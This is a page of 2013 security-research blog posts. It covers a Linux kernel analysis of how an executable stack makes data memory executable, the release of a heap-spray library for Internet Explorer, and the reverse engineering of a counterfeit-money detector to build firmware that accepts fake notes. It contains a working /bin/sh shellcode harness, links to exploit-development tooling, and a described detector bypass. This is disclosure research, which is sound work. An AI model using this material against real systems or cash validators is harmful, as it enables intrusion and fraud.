As we can see, it’s very cheap and easy to get information about ranking members of the US Army. People serving in the US Army should take extra precautions. They should not make their email addresses public and should only use them for “business” related issues, not personal activities.
INSIGHTS | November 27, 2013

A Short Tale About executable_stack in elf_read_implies_exec() in the Linux Kernel

This is a short and basic analysis I did when I was uncertain about code execution in the data memory segment. Later on, I describe what’s happening in the kernel side as well as what seems to be a small logic bug.
I’m not a kernel hacker/developer/ninja; I’m just a Linux user trying to figure out the reason of this behavior by looking in key places such as the ELF loader and other related functions. So, if you see any mistakes or you realize that I approached this in a wrong way, please let me know, I’d really appreciate that.
This article also could be useful for anyone starting in shellcoding since they might think their code is wrong when, in reality, there are other things around to take care of in order to test the functionality of their shellcodes or any other kind of code.
USER-LAND: Why is it possible to execute code in the data segment if it doesn’t have the PF_EXEC enabled?
A couple of weeks ago I was reading an article (in Spanish) about shellcodes creation in Linux x64. For demonstration purposes I’ll use this 64-bit execve(“/bin/sh”) shellcode: 

#include <unistd.h>

char shellcode[] =
“x48x31xd2x48x31xf6x48xbf”
“x2fx62x69x6ex2fx73x68x11”
“x48xc1xe7x08x48xc1xefx08”
“x57x48x89xe7x48xb8x3bx11”
“x11x11x11x11x11x11x48xc1”
“xe0x38x48xc1xe8x38x0fx05”;

int main(int argc, char ** argv) {
void (*fp)();
fp = (void(*)())shellcode;
(void)(*fp)();

return 0;
}

The author suggests the following for the proper execution of the shellcodes:
We compile and with the execstack utility we specify that the stack region used in the binary will be executable…”.

Immediately, I thought it was wrong because of the code to be executed would be placed in the ‘shellcode’ symbol in the .data section within the ELF file, which, in turn, would be in the data memory segment, not in the stack segment at runtime. For some reason, when trying to execute it without enabling the executable stack bit, it failed, and the opposite when it was enabled:

 

According to the execstack’s man-page:

“… ELF binaries and shared libraries now can be marked as requiring executable stack or not requiring it… This marking is done through the p_flags field in the PT_GNU_STACK program header entry… The marking is done automatically by recent GCC versions”.
It only modifies one bit adding the PF_EXEC flag to the PT_GNU_STACK program header. It also can be done by modifying the binary with an ELF editor such as HTEditor or at linking time by passing the argument ‘-z execstack’ to gcc. 
The change can be seen simply observing the flags RWE (Read, Write, Execution) using the readelf utility. In our case, only the ‘E’ flag was added to the stack memory segment:

 
The first loadable segment in both binaries, with the ‘E’ flag enabled, is where the code itself resides (the .text section) and the second one is where all our data resides. It’s also possible to map which bytes from each section correspond to which memory segments (remember, at runtime, the sections are not taken into account, only the program headers) using ‘readelf -l shellcode’.

So far, everything makes sense to me, but, wait a minute, the shellcode, or any other variable declared outside main(), is not supposed to be in the stack right? Instead, it should be placed in the section where the initialized data resides (as far as I know it’s normally in .data or .rodata). Let’s see where exactly it is by showing the symbol table and the corresponding section of each symbol (if it applies):

It’s pretty clear that our shellcode will be located at the memory address 0x00600840 in runtime and that the bytes reside in the .data section. The same result for the other binary, ‘shellcode_execstack’.

By default, the data memory segment doesn’t have the PF_EXEC flag enabled in its program header, that’s why it’s not possible to jump and execute code in that segment at runtime (Segmentation Fault), but: when the stack is executable, why is it also possible to execute code in the data segment if it doesn’t have that flag enabled? 

 
Is it a normal behavior or it’s a bug in the dynamic linker or kernel that doesn’t take into account that flag when loading ELFs? So, to take the dynamic linker out of the game, my fellow Ilja van Sprundel gave me the idea to compile with -static to create a standalone executable. A static binary doesn’t pass through the dynamic linker, instead, it’s loaded directly by the kernel (as far as I know). The same result was obtained with this one, so this result pointed directly to the kernel.

I tested this in a 2.6 kernel (x86_64) and in a 3.2 kernel (i686), and I got the same behavior in both.
KERNEL-LAND: Is that a bug in elf_read_implies_exec()?

Now, for the interesting part, what is really happening in the kernel side? I went straight to load_elf_binary()in linux-2.6.32.61/fs/binfmt_elf.c and found that the program header table is parsed to find the stack segment so as to set the executable_stack variable correctly:

     int executable_stack = EXSTACK_DEFAULT;

elf_ppnt = elf_phdata;
for (i = 0; i < loc->elf_ex.e_phnum; i++, elf_ppnt++)
if (elf_ppnt->p_type == PT_GNU_STACK) {
if (elf_ppnt->p_flags & PF_X)
executable_stack = EXSTACK_ENABLE_X;

else
executable_stack = EXSTACK_DISABLE_X;
break;
}

Keep in mind that only those three constants about executable stack are defined in the kernel (linux-2.6.32.61/include/linux/binfmts.h):

/* Stack area protections */
#define EXSTACK_DEFAULT    0  /* Whatever the arch defaults to */
#define EXSTACK_DISABLE_X  1  /* Disable executable stacks */
#define EXSTACK_ENABLE_X   2  /* Enable executable stacks */

Later on, the process’ personality is updated as follows:

     /* Do this immediately, since STACK_TOP as used in setup_arg_pages may depend on the personality.  */
SET_PERSONALITY(loc->elf_ex);
     if (elf_read_implies_exec(loc->elf_ex, executable_stack))
current->personality |= READ_IMPLIES_EXEC;

if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
current->flags |= PF_RANDOMIZE;

elf_read_implies_exec() is a macro in linux-2.6.32.61/arch/x86/include/asm/elf.h:

/*
* An executable for which elf_read_implies_exec() returns TRUE 

 * will have the READ_IMPLIES_EXEC personality flag set automatically.
*/
#define elf_read_implies_exec(ex, executable_stack)
(executable_stack != EXSTACK_DISABLE_X)

In our case, having an ELF binary with the PF_EXEC flag enabled in the PT_GNU_STACK program header, that macro will return TRUE since EXSTACK_ENABLE_X != EXSTACK_DISABLE_X, thus, our process’ personality will have READ_IMPLIES_EXEC flag. This constant, READ_IMPLIES_EXEC, is checked in some memory related functions such as in mmap.c, mprotect.c and nommu.c (all in linux-2.6.32.61/mm/). For instance, when creating the VMAs (Virtual Memory Areas) by the do_mmap_pgoff() function in mmap.c, it verifies the personality so it can add the PROT_EXEC (execution allowed) to the memory segments [1]:

     /*
* Does the application expect PROT_READ to imply PROT_EXEC?
*
* (the exception is when the underlying filesystem is noexec
*  mounted, in which case we dont add PROT_EXEC.)
*/
if ((prot & PROT_READ) && (current->personality & READ_IMPLIES_EXEC))
if (!(file && (file->f_path.mnt->mnt_flags & MNT_NOEXEC)))
prot |= PROT_EXEC;

And basically, that’s the reason of why code in the data segment can be executed when the stack is executable.

On the other hand, I had an idea: to delete the PT_GNU_STACK program header by changing its corresponding program header type to any other random value. Doing that, executable_stack would remain EXSTACK_DEFAULT when compared in elf_read_implies_exec(), which would return TRUE, right? Let’s see:


The program header type was modified from 0x6474e551 (PT_GNU_STACK) to 0xfee1dead, and note that the second LOAD (data segment, where our code to be executed is) doesn’t have the ‘E’xecutable flag enabled: 

 

The code was executed even when the execution flag is not enabled in the program header that holds it. I think it’s a logic bug in elf_read_implies_exec() because one can simply delete the PT_GNU_STACK header as to set executable_stack = EXSTACK_DEFAULT, making elf_read_implies_exec() to return TRUE. Instead comparing against EXSTACK_DISABLE_X, it should return TRUE only if executable_stack is EXSTACK_ENABLE_X:

#define elf_read_implies_exec(ex, executable_stack)
(executable_stack == EXSTACK_ENABLE_X)

Anyway, perhaps that’s the normal behavior of the Linux kernel for some compatibility issues or something else, but isn’t it weird that making the stack executable or deleting the PT_GNU_STACK header all the memory segments are loaded with execution permissions even when the PF_EXEC flag is not set?

What do you think?
Side notes:
       Kernel developers pass loc->elf_ex and never use it in:
#define elf_read_implies_exec(ex, executable_stack) (executable_stack != EXSTACK_DISABLE_X)

       Two constants are defined but never used in the whole kernel code:
#define INTERPRETER_NONE 0
#define INTERPRETER_ELF  2
Finally, I’d like to thank my collegues Ilja van Sprundel and Diego Bauche Madero for giving me some ideas.
Thanks for reading.
References:
[1] “Understanding the Linux Virtual Memory Manager”. Mel Gorman.
Chapter 4 – Process Address Space.

 

INSIGHTS | November 15, 2013

heapLib 2.0

Hi everyone, as promised I’m releasing my code for heapLib2. For those of you not familiar, I introduced methods to perform predictable and controllable allocations/deallocations of strings in IE9-IE11 using JavaScript and the DOM. Much of this work is based on Alex Sotirov’s research from quite a few years ago (http://www.phreedom.org/research/heap-feng-shui/). 

The zip file contains: 
  • heapLib2.js => The JavaScript library that needs to be imported to use heapLib2
  • heapLib2_test.html => Example usage of some of the functionality that is available in heapLib2
  • html_spray.py => A Python script to generate static HTML pages that could potentially be used to heap spray (i.e. heap spray w/o JavaScript)
  • html_spray.html => An example of a file created with html_spray.py
  • get_elements.py => An IDA Python script that will retrieve information about each DOM element with regards to memory allocation in Internet Explorer. Use this Python script when reversing mshtml.dll. Yes, this is really bad. I’m no good at IDAPython. Make sure to check the ‘start_addr’ and ‘end_addr’ variables in the .py file. If you are having trouble finding the right address do a text search in IDA for “<APPLET>” and follow the cross reference. You should see  similar data structure listings for HTML tags. The ‘start_addr’ should be the address above the reference to the string “A” (anchor tag). 
  • demangler.py => Certainly the worst C++ name demangler you’ll ever see. 
If anyone would like my IDBs or poorly taken notes, just let me know and I’ll send them off. With all that said, I hope at least one person enjoys the library: http://illmatics.com/heapLib2.zip
 
I’d love feedback, comments, suggestions, etc. If you use this library, feel free to buy me a beer if and when you see me . 
INSIGHTS | October 28, 2013

Hacking a counterfeit money detector for fun and non-profit

In Spain we have a saying “Hecha la ley, hecha la trampa” which basically means there will always be a way to circumvent a restriction. In fact, that is pretty much what hacking is all about.

 

It seems the idea of ‘counterfeiting’ appeared at the same time as legitimate money. The Wikipedia page for Counterfeit money  is a fascinating read that helps explain its effects.

 

http://en.wikipedia.org/wiki/Counterfeit_money

 

Nowadays every physical currency implements security measures to prevent counterfeiting. Some counterfeits can be detected with a naked eye, while others need specific devices or procedures to be identified. In order to help employees, counterfeit money detectors can be found in places that accept cash, including shops, malls, postal offices, banks, and gas stations.

 

Recently I took a look at one of these devices, Secureuro. I chose this device because it is widely used in Spain, and its firmware is freely available to download.
http://www.securytec.es/Informacion/clientes-de-secureuro

 

As usual, the first thing I did when approaching a static analysis of a device of this kind was to collect as much information as possible. We should look for anything that could help us to understand how the target works at all levels.

 

In this case I used the following sources:
Youtube
http://www.youtube.com/user/EuroSecurytec
I found some videos where the vendor details how to use the device. This let me analyze the behavior of the device, such as when an LED turns on, when a sound plays, and what messages are displayed. This knowledge is very helpful for understanding the underlying logic when analyzing the assembler later on.
 
 
Vendor Material
Technical specs, manuals, software, firmware … [1] [2] [3] See references.
The following document provides some insights into the device’s security http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf (resource no longer available)
Unfortunately, some of these claims are not completely true and others are simply false. It is possible to understand how Secureuro works; we can access the firmware and EEPROM without even needing hardware hacking. Also, there is no encryption system protecting the firmware.
Before we start discussing the technical details, I would like to clarify that we are not disclosing any trick that could help criminals to bypass the device ‘as is’. My intention is not to forge a banknote that could pass as legitimate, that is a criminal offense. My sole purpose is to explain how I identified the code behind the validation in order to create ‘trojanized’ firmware that accepts even a simple piece of paper as a valid currency. We are not exploiting a vulnerability in the device, just a design feature.
 
 
Analyzing the Firmware
This is the software that downloads the firmware into the device. The firmware file I downloaded from the vendor’s website contains 128K of data that will be flashed to the ATMEGA128 microcontroller. So I can directly load it into IDA, although I do not have access to the EEPROM yet.
 
Entry Points
A basic approach to dealing with this kind of firmware is to identify some elements or entry points that can leveraged to look for interesting pieces of code.
A minimal set includes:
 
Interruption Vector 
  1.  RESET == Main Entry Point
  2.  TIMERs
  3.  UARTs
  4.  SPI
Mnemonics
  1.  LPM (Load Program Memory)
  2.  SPM (Store Program Memory)
  3.  IN
  4.  OUT
Registers
 
ADCL: The ADC Data Register Low
ADCH: The ADC Data Register High
ADCSRA: ADC Control and Status Register
ADMUX: ADC Multiplexer Selection Register
ACSR: Analog Comparator Control and Status
UBRR0L: USART Baud Rate Register
UCSR0B: USART Control and Status Register
UCSR0A: USART Control and Status Register
UDR0: USART I/O Data Register
SPCR: SPI Control Register
SPSR: SPI Status Register
SPDR: SPI Data Register
EECR: EEPROM Control Register
EEDR: EEPROM Data Register
EEARL: EEPROM Address Register Low
EEARH: EEPROM Address Register High
OCR2: Output Compare Register
TCNT2: Timer/Counter Register
TCCR2: Timer/Counter Control Register
OCR1BL: Output Compare Register B Low
OCR1BH: Output Compare Register B High
OCR1AL: Output Compare Register A Low
OCR1AH: Output Compare Register A High
TCNT1L: Counter Register Low Byte
TCNT1H: Counter Register High Byte
TCCR1B: Timer/Counter1 Control Register B
TCCR1A: Timer/Counter1 Control Register A
OCR0: Timer/Counter0 Output Compare Register
TCNT0: Timer/Counter0
TCCR0: Timer/Counter Control Register
TIFR: Timer/Counter Interrupt Flag Register
TIMSK: Timer/Counter Interrupt Mask Register
Using this information, we should reconstruct some firmware functions to make it more reverse engineering friendly.
First, I try to identify the Main, following the flow at the RESET ISR. This step is pretty straightforward.
As an example of collecting information based on the mnemonics, we identify a function reading from flash memory, which is renamed to ‘readFromFlash‘. Its cross-references will provide valuable information.
By finding the references to the registers involved in EEPROM operations I come across the following functions ‘sub_CFC‘ and ‘sub_CF3‘:

 

The first routine reads from an arbitrary address in the EEPROM. The second routine writes to the EEPROM. I rename ‘sub_CFC‘ to ‘EEPROM_read‘ and ‘sub_CF3‘ to ‘EEPROM_write‘. These two functions are very useful, and provide us with important clues.
Now that our firmware looks like a little bit more friendly, we focus on the implemented functionalities. The documentation I collected states that this device has been designed to allow communications with a computer; therefore we should start by taking a look at the UART ISRs.
Tip: You can look for USART configuration registers UCSR0B, UBRR0… to see how it is configured. 
USART0_RX
It is definitely interesting, when receiving a ‘J’ (0x49) character it initializes the usual procedure to send data through the serial interface. It checks UDRE until it is ready and then sends outs bytes through UDR0. Going down a little bit I find the following piece of code
It is using the function to read from the EEPROM I identified earlier. It seems that if we want to understand what is going on we will have to analyze the other functions involved in this basic block, ‘sub_3CBB‘ and ‘sub_3C9F‘.
 
SUB_3CBB
This function is receiving two parameters, a length (r21:r20) and a memory address (r17:r16), and transmitting the n bytes located at the memory address through UDR0. It basically sends n bytes through the serial interface.
I rename ‘sub_3CBB’ to ‘dumpMemToSerial‘. So  this function being called in the following way: dumpMemToSerial(0xc20,9). What’s at address 0xc20? Apparently nothing that makes sense to dump out. I must be missing something here. What can we do? Let’s analyze the stub code the linker puts at the RESET ISR, just before the ‘Main’ entry point. That code usually contains routines for custom memory initialization.
Good enough, ‘sub_4D02‘ is a memory copy function from flash to SRAM. It uses LPM so it demonstrates how important it is to check specific mnemonics to discover juicy functions.
Now take a look at the parameters, at ROM:4041 it is copying 0x2BD bytes (r21:r20) from 0x80A1 (r31:r30) to 0xBC2 (r17:r16). If we go to 0x80A1 in the firmware file, we will find a string table!
Knowing that 0xBC2 has the string table above, my previous call makes much more sense now: dumpMemToSerial(0xc20,9) => 0xC20 – 0xBC2 = 0x5E
String Table (0x80A1) + 0x5E == “#RESETS”
The remaining function to analyze is ‘sub_3C9F‘, which is basically formatting a byte to its ASCII representation to send it out through the serial interface. I rename it ‘hex2ascii
So, according to the code, if we send ‘J’ to the device, we should be receiving some statistics. This matches what I read in the documentation.
http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf
Now this basic block seems much clearer. It is ‘printing’ some internal statistics.
“#RESETS: 000000” where 000000 is a three byte counter
(“BILLETES” means “BANKNOTES” in Spanish)
“#BILLETES: 000000 “
(“NO VALIDOS” means “INVALIDS” in Spanish)
#NO VALIDOS: 000000
Wait, hold on a second, the number of invalid banknotes is being stored in a three byte counter in the EEPROM, starting at position 0xE. Are you thinking what I’m thinking? We should look for the opposite operation. Where is that counter being incremented? That path would hopefully lead us to the part of code where a banknote is considered valid or invalid 🙂 Keep calm and ‘EEPROM_write’
Bingo!
Function ‘sub_1FEB’ (I rename it ‘incrementInvalid’) is incrementing the INVALID counter. Now I look for where it is being called.
incrementInvalid‘ is part of a branch, guess what’s in the other part?
In the left side of the branch, a variable I renamed ‘note_Value’, is being compared against 5 (5€) 0xA (10€). On the other hand, the right side of the branch leads to ‘incrementInvalid‘. Mission accomplished! We found the piece of code where the final validation is performed.
Without entering into details, but digging a little bit further by checking where ‘note_Value’ is being referenced, I easily narrow down the scope of the validation to two complex functions. The first one assigns a value of either 1 or 2 to ‘note_Value’ :
The second function takes into account this value to assigns the final value. When ‘note_Value’ is equal to 1, the possible values for the banknotes are: 5,10, and 20. Otherwise the values should be 50, 100, 200, or 500. Why?
I need to learn about Euro banknotes, so I take a look at the “Trainer’s guide to the Eurobanknotes and coins” from the European Central Bank http://www.ecb.europa.eu/euro/pdf/material/Trainer_A4_EN_SPECIMEN.pdf
Curious, this classification makes what I see in the code actually make sense. Maybe, only maybe, the first function is detecting the hologram type, and the second function is processing the remaining security features and finally assigning the value. The documentation from the vendor states:
Well, what about those six analogue signals? By checking for the registers involved in ADC operations we are able to identify an interesting function that I rename ‘getAnalogToDigital
This function receives the input pin from the ADC conversion as a parameter. As expected, it is invoked to complete the conversion of six different pins; inside a timer. The remaining three digital signals with information about the distances can also be obtained easily.
There are a lot of routines we could continue reconstructing: password, menu, configurations, timers, hidden/debug functionalities, but that is outside of the scope of this post. I merely wanted to identify a very specific functionality.
The last step was to buy the physical device. I modified the original firmware to accept our home-made IOActive currency, and…what do you think happened? Did it work? Watch the video to find it out 😉
The impact is obvious. An attacker with temporary physical access to the device could install customized firmware and cause the device to accept counterfeit money. Taking into account the types of places where these devices are usually deployed (shops, mall, offices, etc.)  this scenario is more than feasible.
Once again we see that when it comes to static analysis, collecting information about the target is as important as reverse engineering its code. Without the knowledge gained by reading all of those documents and watching the videos, reverse engineering would have been way more difficult.
I hope you find this useful in some way. I would be pleased if this post encourages you to research further or helps vendors understand the importance of building security measures into these types of devices.
References:
 
[1]http://www.inves.es/secureuro?p_p_id=56_INSTANCE_6CsS&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=detalleserie&p_p_col_count=1&_56_INSTANCE_6CsS_groupId=18412&_56_INSTANCE_6CsS_articleId=254592&_56_INSTANCE_6CsS_tabSelected=3&templateId=TPL_Detalle_Producto
[2] http://www.secureuro.com/secureuro/ingles/menuingles.htm#
[3] http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf

 

[4] http://www.youtube.com/user/EuroSecurytec